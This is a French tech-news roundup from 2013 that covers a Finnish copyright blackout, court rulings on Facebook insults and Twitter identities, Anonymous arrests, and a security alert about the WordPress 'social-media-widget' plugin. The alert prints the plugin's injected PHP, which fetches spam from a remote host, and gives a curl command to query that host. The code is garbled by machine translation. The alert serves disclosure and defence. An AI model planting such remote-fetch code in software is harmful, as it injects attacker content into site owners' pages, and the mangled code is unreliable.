0

Demain, les sites Finlandais feront un Blackout pour sensibiliser à la nécessité d’assouplir le droit d’auteur

-

 Demain, en Finlande, les sites web feront un blackout (se noirciront) afin de  sensibiliser à la nécessité d’assouplir le droit d’auteur dans l’environnement numérique

Pendant le blackout, ils conduiront les visiteurs à signer une pétition en ligne .

screenshot-1

 

Il y a un peu plus d’un an, la Finlande a modifié la constitution nationale afin que toute pétition qui atteint 50.000 signatures soit portée au parlement pour un vote.

Au moment de la publication, cette proposition a recueilli 26 348 signatures.

Le droit d’auteur  Finlandais a été appelé à être réformé  suite à une polémique qui a abouti après qu’une fillette de 9 ans ait vu son domicile perquisitionné et son ordinateur winnie l’ourson saisi car elle avait tenté de télécharger un album MP3.

Verkkokauppa.com , MoonTV, Alaston Suomi, Afterdawn, FinDance ja Ylilauta et un tas de petits sites ont déjà adhéré à la campagne.

Un plugin pour WordPress a été créé pour l’occasion.

 

source : http://www.arcticstartup.com/2013/04/22/finnish-sites-blacking-out-tomorrow-in-support-of-copyright-petition

1

Alerte plugin "social-media-widget". 930 000 wordpress en danger!

-

Si vous utilisez le plug-in Widget médias sociaux (social-media-widget), veillez à le retirer immédiatement de votre site web. Nous avons découvert qu’il est utilisé pour injecter le spam dans les sites Web et il a également été supprimé du référentiel Plugin WordPress .

Ceci est un plugin très populaire avec plus de 900.000 téléchargements. Il a le potentiel d’avoir un impact sur beaucoup de sites Web.

Screen Shot 09/04/2013 au 11/03/12 AM

Détails techniques

Le plugin a un appel caché menant à  l’adresse suivante: httx :/ / i.aaur.net / i.php, qui est utilisé pour injecter « Pay Day Loan » spam dans les sites Web exécutant le plugin. 

Le code malveillant a été ajouté il ya seulement 12 jours quand ils ont lancé la version 4.0 du plugin. Nous recommandons donc que tout le monde enlève ce plugin immédiatement avant que nous ayons plus d’informations. 

voici le code malveillant qui a été ajouté au plugin:

470 
471 $ smw_url = « hxxp :/ / i.aaur.net / i.php »; 
472 if {(function_exists (« smw_get »)!) 
fonction smw_get 473 ($ f) { 
réponse wp_remote_get = 474 $ ($ f) , 
475 cas (is_wp_error ($ response)) { 
476 smw_get_body fonction ($ f) { 
477 $ ch = @ curl_init (); 
478 @ curl_setopt ($ ch, CURLOPT_URL, $ f) 
@ 479 curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, vrai), 
480 $ @ output = curl_exec ($ ch); 
curl_close @ 481 ($ ch); 
482 return $ sortie; 
} 483 
484 écho smw_get_body ($ f); 
485} else { 
echo $ 486 response [‘corps’] , 
487} 
488} 
489 smw_get (smw_url $) 
490}

Le code lui-même est très simple. Vous pouvez voir où ils tirent l’url illicite sur la ligne 471. Le reste n’est que gestion des erreurs et d’incorporation de l’injection.

En fait, si vous voulez l’essayer en toute sécurité, il suffit d’ouvrir votre terminal convivial et lancez:

curl -D – hxxp://i.aaur.net/i.php

Vous obtiendrez quelque chose comme ceci:

Screen Shot 09/04/2013 au 29/10/13 AM

Vous pouvez clairement voir l’injection et en retour le SPAM injecté. Or, dans ce cas vous ne faites que voir  l’injection, mais une fois que cela est intégré dans votre site, il se cache parmi tous vos autres codes, ce qui rend difficile pour vous en tant que propriétaire du site à le trouver. 

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html

0

Injurier en privé sur Facebook peut valoir 38 euros d'amende

-

Tout en reconnaissant que les injures publiées sur une page privée de Facebook ne pouvaient pas être condamnées au titre de l’injure publique, la cour de cassation a prévenu dans un arrêt rendu ce mercredi qu’il reste possible de condamner les auteurs pour injure non publique, à une amende de 1ère classe.

La cour de cassation fixe un début de jurisprudence concernant la responsabilité pénale des internautes qui commettent des injures sur Facebook ou tout autre réseau social. Dans un arrêt du 10 avril 2013 rendu par la première chambre civile, la Cour a estimé que le fait d’injurier un individu ou une entreprise sur Facebook ou MSN ne relevait pas de l’injure publique dès lors que seuls les amis ou membres pouvaient lire les propos litigieux.

« Après avoir constaté que les propos litigieux avaient été diffusés sur les comptes ouverts par Mme Y… tant sur le site Facebook que sur le site MSN, lesquels n’étaient en l’espèce accessibles qu’aux seules personnes agréées par l’intéressée, en nombre très restreint, la cour d’appel a retenu, par un motif adopté exempt de caractère hypothétique, que celles ci formaient une communauté d’intérêts« , constate la Cour. Elle conclut donc que les juges d’appel ont « exactement déduit que ces propos ne constituaient pas des injures publiques« .

En cela, la plus haute juridiction conforte les juges des prud’homme de Boulogne-Billancourt, qui avaient décidé en 2010 (dans une toute autre affaire) de condamner des salariés qui avaient critiqué leur entreprise sur le réseau social, parce que les propos avaient été publiés sur un « mur » visible publiquement. De même, le 15 novembre 2011, la Cour d’appel de Besançon avait établi cette distinction entre les « murs » publics, et les proposés limités aux seuls amis, ce qui est constant depuis.

Pour licencier un salarié pour les propos tenus sur sa page Facebook,l’employeur doit faire la preuve que le profil est public.

Mais la cour de cassation a ouvert une porte. Dans son arrêt, elle note en effet que « la cour d’appel s’est bornée à constater que les propos litigieux ne constituaient pas des injures publiques« , alors qu’il lui fallait « rechercher si les propos litigieux pouvaient être qualifiés d’injures non publiques« .

En effet, l’article R621-2 du code pénal prévoit une peine de 38 euros d’amende pour « l’injure non publique envers une personne, lorsqu’elle n’a pas été précédée de provocation« . Si la loi contre les injures publiques s’était appliquée, c’est 12 000 euros d’amende qui étaient encourus.

En l’espèce, il était reproché à la salariée d’avoir écrit des messages comme « sarko devrait voter une loi pour exterminer les directrices chieuses comme la mienne », « éliminons nos patrons et surtout nos patronnes (mal baisées) qui nous pourrissent la vie », ou encore « Y’en a marre des connes ». 38 euros pour se soulager.

Article diffusé sous licence Creative Common by-nc-nd 2.0, écrit par Guillaume Champeau pour Numerama.com
0

#opIsrael : Les forces de sécurité jordaniennes ont arrêté plusieurs jeunes présumé Anonymous

-

Les forces de sécurité jordaniennes ont arrêté plusieurs jeunes qui sont soupçonnés d’attaquer des sites internet israéliens dans le cadre de la cyber-attaque de grande envergure sur Israël déclarés par le groupe appelé Anonymous.

En réponse, Anonymous a menacé d’attaquer des sites internet jordaniens. Le groupe a exigé la libération immédiate des militants.

http://www.israelnationalnews.com/News/News.aspx/166857#.UWRz0KLxrOI

0

Twitter encore sommé de livrer l'identité d'un internaute français

-

Le tribunal de grande instance de Paris a ordonné à Twitter de livrer à un plaignant l’identité d’un internaute qui s’était fait passer pour lui sur le réseau social. La société, qui refuse d’obtempérer, devra payer 500 euros d’indemnités par jour de retard.

En l’espèce, il s’agit d’un internaute accusé d’avoir usurpé l’identité d’un tiers, pour diffuser des messages en se faisant passer pour lui. 

Depuis la promulgation de la loi Loppsi, le code pénal prévoit un très large délit d’usurpation d’identité, puni d’un an d’emprisonnement et de 15 000 euros d’amende.

Comme à son habitude, Twitter refuse de communiquer les données en sa possession à la justice française, au prétexte qu’elles seraient hébergées aux Etats-Unis et ne seraient donc pas soumises aux lois françaises. 

De façon originale et contestable, le tribunal se fonde sur l’article 809 du code de procédure civile, qui permet au président du TGI de prescrire toutes mesures qui permettent de « prévenir un dommage imminent« , ou de « faire cesser un trouble manifestement illicite« . 

Or dans cette affaire, le compte Twitter en cause a déjà été supprimé par l’éditeur du réseau social, et il n’y a donc plus de trouble à faire cesser. 

Pour tenter d’obliger Twitter à obtempérer, le tribunal a ordonné une astreinte de 500 euros par jour de retard. L’addition pourrait ainsi être lourde, si jamais le réseau social était effectivement condamné un jour.

Article diffusé sous licence Creative Common by-nc-nd 2.0, écrit par Guillaume Champeau pour Numerama.com